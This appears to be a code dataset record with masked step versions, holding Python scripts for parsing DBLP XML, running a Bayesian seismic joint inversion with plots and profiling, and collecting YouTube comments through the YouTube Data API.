parser.entity[\"Aring\"] = 'Å'\n parser.entity[\"Oacute\"] = 'Ò'\n parser.entity[\"ograve\"] = 'ó'\n parser.entity[\"yuml\"] = 'ÿ'\n parser.entity[\"eth\"] = 'ð'\n parser.entity[\"aelig\"] = 'æ'\n parser.entity[\"AElig\"] = 'Æ'\n parser.entity[\"Agrave\"] = 'Á'\n parser.entity[\"Iuml\"] = 'Ï'\n parser.entity[\"micro\"] = 'µ'\n parser.entity[\"Acirc\"] = 'Â'\n parser.entity[\"Otilde\"] = 'Õ'\n parser.entity[\"Egrave\"] = 'É'\n parser.entity[\"ETH\"] = 'Ð'\n parser.entity[\"ugrave\"] = 'ú'\n parser.entity[\"ucirc\"] = 'û'\n parser.entity[\"thorn\"] = 'þ'\n parser.entity[\"THORN\"] = 'Þ'\n parser.entity[\"Iacute\"] = 'Ì'\n parser.entity[\"Icirc\"] = 'Î'\n parser.entity[\"Ntilde\"] = 'Ñ'\n parser.entity[\"Ecirc\"] = 'Ê'\n parser.entity[\"Ocirc\"] = 'Ô'\n parser.entity[\"Ograve\"] = 'Ó'\n parser.entity[\"Igrave\"] = 'Í'\n parser.entity[\"Atilde\"] = 'Ã'\n parser.entity[\"Yacute\"] = 'Ỳ'\n parser.entity[\"Ucirc\"] = 'Û'\n parser.entity[\"Euml\"] = 'Ë'\n\n\n xml_file = '../../../data/dblp.' 
+ str(self.filenum) + '.xml'\n\n e = ET.parse(xml_file, parser=parser).getroot()\n\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n\n # Borrado previo del fichero de resultados\n with open('../../../data/result' + str(self.filenum) +'.txt', 'w') as out:\n out.writelines('')\n\n # Almacenamiento de valores en dicc para volcado posterior a json\n for child1 in e:\n if ((doc_number / tot_docs > 0.5) & (not mitad)):\n print('50% de los documentos procesados en el thread',str(self.filenum))\n mitad = True\n if ((doc_number / tot_docs > 0.9) & (not max_mitad)):\n print('90% de los documentos procesados en el thread',str(self.filenum))\n max_mitad = True\n if ((doc_number / tot_docs == 1.0) & (not complete)):\n print('100% de los documentos procesados en el thread',str(self.filenum))\n complete = True\n if (child1.tag in docs):\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if (child2.tag in tags):\n if (child2.tag == 'author'):\n dicc_aut = dict()\n dicc_aut[\"Nombre\"] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == \"title\":\n d[\"Title\"] = child2.text\n elif child2.tag == \"year\":\n d[\"Year\"] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\nfor i in range(7):\n MyThread(i).start()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 14:23:28 2018
@author: emily
"""
import pipeline
import numpy as np
import matplotlib.pyplot as plt
import pstats
import cProfile
pr = cProfile.Profile()
pr.enable()
#def try_running():
max_it=200000
rnd_sd = 1
deps = np.concatenate((np.arange(0,10,0.2), np.arange(10,60,1), np.arange(60,201,5)))
model = pipeline.Model(vs = np.arange(3.5, 4.8, 0.1), all_deps = deps,
idep = np.array([25, 50, 60,70,80,90,100,102,104,106,
108,110,112]),
std_rf = 0, lam_rf = 0, std_swd = 0)
#model = pipeline.Model(vs = np.array([1.8, 2.4, 3.4, 4.5, 4.7, 4.65]), all_deps = deps,
# idep = np.array([10, 32, 41, 60, 96, 120]),
# std_rf = 0, lam_rf = 0, std_swd = 0)
#model = pipeline.Model(vs = np.array([3.4, 4.5]), all_deps = deps,
# idep = np.array([60, 96]),
# std_rf = 0, lam_rf = 0, std_swd = 0)
rf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))
swd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1/np.arange(0.02,0.1, 0.01), 1e6)
all_lims = pipeline.Limits(
vs = (0.5,5.5), dep = (0,200), std_rf = (0,0.05),
lam_rf = (0.05, 0.5), std_swd = (0,0.15))
out = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)
actual_model = pipeline.SaveModel(pipeline.MakeFullModel(model),out[1][:,0])
#%%
all_models = out[1]
good_mods = all_models[:,np.where(all_models[0,]>0)[0]]
nit = good_mods.shape[1]
good_mods = good_mods[:,-int(nit/5):]
mean_mod = np.mean(good_mods, axis = 1)
std_mod = np.std(good_mods, axis = 1)
good_mod = pipeline.Model(vs = mean_mod, all_deps = all_models[:,0],
idep = np.arange(0,mean_mod.size),
lam_rf = 0, std_rf = 0, std_swd = 0)
fullmodel = pipeline.MakeFullModel(good_mod)
fig1 = plt.figure();
ax1 = plt.subplot(121)
for k in range(all_models[1,].size-1):
colstr = str(0.75-k/2/all_models[1,].size)
plt.plot(all_models[:,k],all_models[:,0],
'-',linewidth=1,color=colstr)
ax1.invert_yaxis()
ax1.plot(actual_model,all_models[:,0],'r-',linewidth=3)
ax1.set_xlim((1.5,5))
ax1.set_xlabel('Shear Velocity (km/s)')
ax1.set_ylabel('Depth (km)')
ax1.set_title("{} iterations".format(nit*100))
ax3 = plt.subplot(122)
for k in range(good_mods[0,].size-1):
colstr = str(0.85-k/2/good_mods[0,].size)
ax3.plot(good_mods[:,k],all_models[:,0],
'-',linewidth=1,color=colstr)
ax3.invert_yaxis()
ax3.plot(mean_mod,all_models[:,0],'b-',linewidth = 2)
ax3.plot(mean_mod+std_mod, all_models[:,0],'c-',linewidth = 1)
ax3.plot(mean_mod-std_mod, all_models[:,0],'c-',linewidth = 1)
ax3.plot(actual_model,all_models[:,0],'r--',linewidth=1)
ax3.set_xlim((1.5,5))
ax3.set_xlabel('Shear Velocity (km/s)')
ax3.set_ylabel('Depth (km)')
ax3.set_title('Most recent {}'.format(good_mods.shape[1]))
allvels = np.arange(all_lims.vs[0],all_lims.vs[1],0.01)
evendeps = np.arange(0,all_models[-1,0],0.1)
i_ed = np.zeros(evendeps.shape, dtype = int)
for k in range(all_models[:,0].size-1,0,-1):
i_ed[all_models[k,0]>=evendeps] = k
mod_space = np.zeros((evendeps.size,allvels.size))
for k in range(1,good_mods.shape[1]):
even_vels = good_mods[i_ed,-k]
inds = np.round(even_vels-all_lims.vs[0],2)/0.01
inds = inds.astype(int)
mod_space[range(mod_space.shape[0]),inds] += 1
plt.tight_layout()
fig2 = plt.figure()
ax2 = plt.subplot(121)
ax2.imshow(np.log10(mod_space[-1::-1]+1e-1), cmap = 'viridis', aspect = allvels[-1]/evendeps[-1],
extent = [allvels[0], allvels[-1], evendeps[0], evendeps[-1]])
ax2.invert_yaxis()
ax2.set_xlabel('Shear Velocity (km/s)')
ax2.set_ylabel('Depth (km)')
ax2.xaxis.set_label_position('top')
ax2.xaxis.tick_top()
ax2.set_xlim((1.5,5))
plt.figure(); plt.title('Receiver Function - real: red; synth: grey')
rft = np.arange(0,rf_obs.dt*rf_obs.amp.size,rf_obs.dt)
plt.plot(rft, rf_obs.amp, 'r-', linewidth=2)
synth_rf = pipeline.SynthesiseRF(fullmodel)
plt.plot(rft,synth_rf.amp, '-',color = '0.25', linewidth=1)
synth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1e6)
plt.figure(); plt.title('Surface Wave Dispersion - real: red; synth: grey')
plt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)
plt.plot(synth_swd.period, synth_swd.c, '-',color = '0.25', linewidth=1)
plt.figure(); plt.title("Mahalanobis distance (least squares misfit - phi)")
plt.plot(np.log10(out[2]))
plt.figure(); plt.title("Likelihood of accepting new model - alpha(m|m0)")
plt.plot(np.log10(out[3]))
print(np.mean(out[4]))
#%%
pr.disable()
s=open('thingy4.txt','w')
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
s.close()
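
# Note: a slightly more robust variant would write the profile report through a
# context manager, which closes the file even if print_stats() fails:
#     with open('thingy4.txt', 'w') as s:
#         pstats.Stats(pr, stream=s).sort_stats('cumulative').print_stats()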
|
normal
|
{
"blob_id": "cfe5d013c968afdbf1fc80e3c8c3233a3678450b",
"index": 9848,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npr.enable()\n<mask token>\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\n<mask token>\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\n<mask token>\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\n<mask token>\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\n<mask token>\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\n<mask token>\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\n<mask token>\nplt.plot(rft, synth_rf.amp, '-', color='0.25', linewidth=1)\n<mask token>\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\n<mask token>\nps.print_stats()\ns.close()\n",
"step-3": "<mask token>\npr = cProfile.Profile()\npr.enable()\nmax_it = 200000\nrnd_sd = 1\ndeps = np.concatenate((np.arange(0, 10, 0.2), np.arange(10, 60, 1), np.\n arange(60, 201, 5)))\nmodel = pipeline.Model(vs=np.arange(3.5, 4.8, 0.1), all_deps=deps, idep=np.\n array([25, 50, 60, 70, 80, 90, 100, 102, 104, 106, 108, 110, 112]),\n std_rf=0, lam_rf=0, std_swd=0)\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1 / np.\n arange(0.02, 0.1, 0.01), 1000000.0)\nall_lims = pipeline.Limits(vs=(0.5, 5.5), dep=(0, 200), std_rf=(0, 0.05),\n lam_rf=(0.05, 0.5), std_swd=(0, 0.15))\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model), out[1][:, 0])\nall_models = out[1]\ngood_mods = all_models[:, np.where(all_models[0,] > 0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:, -int(nit / 5):]\nmean_mod = np.mean(good_mods, axis=1)\nstd_mod = np.std(good_mods, axis=1)\ngood_mod = pipeline.Model(vs=mean_mod, all_deps=all_models[:, 0], idep=np.\n arange(0, mean_mod.size), lam_rf=0, std_rf=0, std_swd=0)\nfullmodel = pipeline.MakeFullModel(good_mod)\nfig1 = plt.figure()\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\nallvels = np.arange(all_lims.vs[0], all_lims.vs[1], 0.01)\nevendeps = np.arange(0, all_models[-1, 0], 0.1)\ni_ed = np.zeros(evendeps.shape, dtype=int)\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\nmod_space = np.zeros((evendeps.size, allvels.size))\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0, rf_obs.dt * rf_obs.amp.size, rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft, synth_rf.amp, '-', color='0.25', linewidth=1)\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 
1000000.0)\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\ns = open('thingy4.txt', 'w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()\n",
"step-4": "<mask token>\nimport pipeline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pstats\nimport cProfile\npr = cProfile.Profile()\npr.enable()\nmax_it = 200000\nrnd_sd = 1\ndeps = np.concatenate((np.arange(0, 10, 0.2), np.arange(10, 60, 1), np.\n arange(60, 201, 5)))\nmodel = pipeline.Model(vs=np.arange(3.5, 4.8, 0.1), all_deps=deps, idep=np.\n array([25, 50, 60, 70, 80, 90, 100, 102, 104, 106, 108, 110, 112]),\n std_rf=0, lam_rf=0, std_swd=0)\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1 / np.\n arange(0.02, 0.1, 0.01), 1000000.0)\nall_lims = pipeline.Limits(vs=(0.5, 5.5), dep=(0, 200), std_rf=(0, 0.05),\n lam_rf=(0.05, 0.5), std_swd=(0, 0.15))\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model), out[1][:, 0])\nall_models = out[1]\ngood_mods = all_models[:, np.where(all_models[0,] > 0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:, -int(nit / 5):]\nmean_mod = np.mean(good_mods, axis=1)\nstd_mod = np.std(good_mods, axis=1)\ngood_mod = pipeline.Model(vs=mean_mod, all_deps=all_models[:, 0], idep=np.\n arange(0, mean_mod.size), lam_rf=0, std_rf=0, std_swd=0)\nfullmodel = pipeline.MakeFullModel(good_mod)\nfig1 = plt.figure()\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\nallvels = np.arange(all_lims.vs[0], all_lims.vs[1], 0.01)\nevendeps = np.arange(0, all_models[-1, 0], 0.1)\ni_ed = np.zeros(evendeps.shape, dtype=int)\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\nmod_space = np.zeros((evendeps.size, allvels.size))\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0, rf_obs.dt * rf_obs.amp.size, rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft, synth_rf.amp, '-', 
color='0.25', linewidth=1)\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1000000.0)\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\ns = open('thingy4.txt', 'w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 5 14:23:28 2018\n\n@author: emily\n\"\"\"\n\nimport pipeline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pstats\nimport cProfile\n \npr = cProfile.Profile()\npr.enable()\n\n\n#def try_running():\nmax_it=200000\nrnd_sd = 1\n\n\ndeps = np.concatenate((np.arange(0,10,0.2), np.arange(10,60,1), np.arange(60,201,5)))\nmodel = pipeline.Model(vs = np.arange(3.5, 4.8, 0.1), all_deps = deps,\n idep = np.array([25, 50, 60,70,80,90,100,102,104,106,\n 108,110,112]), \n std_rf = 0, lam_rf = 0, std_swd = 0)\n\n#model = pipeline.Model(vs = np.array([1.8, 2.4, 3.4, 4.5, 4.7, 4.65]), all_deps = deps,\n# idep = np.array([10, 32, 41, 60, 96, 120]), \n# std_rf = 0, lam_rf = 0, std_swd = 0)\n#model = pipeline.Model(vs = np.array([3.4, 4.5]), all_deps = deps,\n# idep = np.array([60, 96]), \n# std_rf = 0, lam_rf = 0, std_swd = 0)\n\n\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1/np.arange(0.02,0.1, 0.01), 1e6)\nall_lims = pipeline.Limits(\n vs = (0.5,5.5), dep = (0,200), std_rf = (0,0.05),\n lam_rf = (0.05, 0.5), std_swd = (0,0.15))\n\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\n\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model),out[1][:,0])\n#%%\nall_models = out[1]\ngood_mods = all_models[:,np.where(all_models[0,]>0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:,-int(nit/5):]\nmean_mod = np.mean(good_mods, axis = 1)\nstd_mod = np.std(good_mods, axis = 1)\n\ngood_mod = pipeline.Model(vs = mean_mod, all_deps = all_models[:,0],\n idep = np.arange(0,mean_mod.size),\n lam_rf = 0, std_rf = 0, std_swd = 0)\nfullmodel = pipeline.MakeFullModel(good_mod)\n\n\n\nfig1 = plt.figure();\n\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size-1): \n colstr = str(0.75-k/2/all_models[1,].size)\n plt.plot(all_models[:,k],all_models[:,0],\n '-',linewidth=1,color=colstr)\nax1.invert_yaxis()\nax1.plot(actual_model,all_models[:,0],'r-',linewidth=3)\nax1.set_xlim((1.5,5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title(\"{} iterations\".format(nit*100))\n\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size-1): \n colstr = str(0.85-k/2/good_mods[0,].size)\n ax3.plot(good_mods[:,k],all_models[:,0],\n '-',linewidth=1,color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod,all_models[:,0],'b-',linewidth = 2)\nax3.plot(mean_mod+std_mod, all_models[:,0],'c-',linewidth = 1)\nax3.plot(mean_mod-std_mod, all_models[:,0],'c-',linewidth = 1)\nax3.plot(actual_model,all_models[:,0],'r--',linewidth=1)\nax3.set_xlim((1.5,5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\n\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\n\n\nallvels = np.arange(all_lims.vs[0],all_lims.vs[1],0.01)\nevendeps = np.arange(0,all_models[-1,0],0.1)\ni_ed = np.zeros(evendeps.shape, dtype = int)\nfor k in range(all_models[:,0].size-1,0,-1):\n i_ed[all_models[k,0]>=evendeps] = k\n \nmod_space = np.zeros((evendeps.size,allvels.size))\nfor k in range(1,good_mods.shape[1]):\n even_vels = good_mods[i_ed,-k]\n inds = np.round(even_vels-all_lims.vs[0],2)/0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]),inds] += 1 \n\nplt.tight_layout()\n\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1]+1e-1), cmap = 'viridis', aspect = allvels[-1]/evendeps[-1],\n extent = [allvels[0], allvels[-1], evendeps[0], 
evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5,5))\n\nplt.figure(); plt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0,rf_obs.dt*rf_obs.amp.size,rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft,synth_rf.amp, '-',color = '0.25', linewidth=1)\n\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1e6)\nplt.figure(); plt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-',color = '0.25', linewidth=1)\n\n\nplt.figure(); plt.title(\"Mahalanobis distance (least squares misfit - phi)\")\nplt.plot(np.log10(out[2]))\n\nplt.figure(); plt.title(\"Likelihood of accepting new model - alpha(m|m0)\")\nplt.plot(np.log10(out[3]))\n\nprint(np.mean(out[4]))\n#%%\npr.disable()\ns=open('thingy4.txt','w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import requests
from pyyoutube import Api
def get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):
"""
    Retrieve information for a video page, given its video id.
"""
YOUTUBE_URI = 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&' + \
'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'
format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY,
videoId=videoId,
maxResults=maxResults,
nextPageToken=nextPageToken)
content = requests.get(format_youtube_uri).text
data = json.loads(content)
return data
def get_text_of_comment(data):
"""
    Extract the comments from the data retrieved for a single video.
"""
comms = set()
for item in data['items']:
comm = item['snippet']['topLevelComment']['snippet']['textDisplay']
comms.add(comm)
return comms
def get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30, maxResults=10, nextPageToken=''):
"""
    Download maxResults comments per video found for the query.
"""
api = Api(api_key=YOUTUBE_API_KEY)
video_by_keywords = api.search_by_keywords(q=query,
search_type=["video"],
count=count_video,
limit=limit)
videoId = [x.id.videoId for x in video_by_keywords.items]
comments_all = []
for id_video in videoId:
try:
data = get_data(YOUTUBE_API_KEY,
id_video,
maxResults=maxResults,
nextPageToken=nextPageToken)
comment = list(get_text_of_comment(data))
comments_all.append(comment)
except:
continue
comments = sum(comments_all, [])
return comments
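

# Note: minimal usage sketch, not part of the original snippet. The API key
# below is a placeholder; note also that the bare `except` inside
# get_all_comments silently skips videos whose comments are disabled.
if __name__ == '__main__':
    YOUTUBE_API_KEY = 'YOUR_API_KEY'  # placeholder, not a real key
    found = get_all_comments(YOUTUBE_API_KEY, query='python tutorial',
                             count_video=5, limit=10, maxResults=20)
    print(len(found), 'comments fetched')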
|
normal
|
{
"blob_id": "4ed5ceb784fb1e3046ab9f10c4b556f2e94274db",
"index": 7054,
"step-1": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data(YOUTUBE_API_KEY, videoId, maxResults, nextPageToken):\n \"\"\"\n Получение информации со страницы с видео по video id\n \"\"\"\n YOUTUBE_URI = (\n 'https://www.googleapis.com/youtube/v3/commentThreads?key={KEY}&textFormat=plainText&'\n +\n 'part=snippet&videoId={videoId}&maxResults={maxResults}&pageToken={nextPageToken}'\n )\n format_youtube_uri = YOUTUBE_URI.format(KEY=YOUTUBE_API_KEY, videoId=\n videoId, maxResults=maxResults, nextPageToken=nextPageToken)\n content = requests.get(format_youtube_uri).text\n data = json.loads(content)\n return data\n\n\n<mask token>\n\n\ndef get_all_comments(YOUTUBE_API_KEY, query, count_video=10, limit=30,\n maxResults=10, nextPageToken=''):\n \"\"\"\n Выгрузка maxResults комментариев\n \"\"\"\n api = Api(api_key=YOUTUBE_API_KEY)\n video_by_keywords = api.search_by_keywords(q=query, search_type=[\n 'video'], count=count_video, limit=limit)\n videoId = [x.id.videoId for x in video_by_keywords.items]\n comments_all = []\n for id_video in videoId:\n try:\n data = 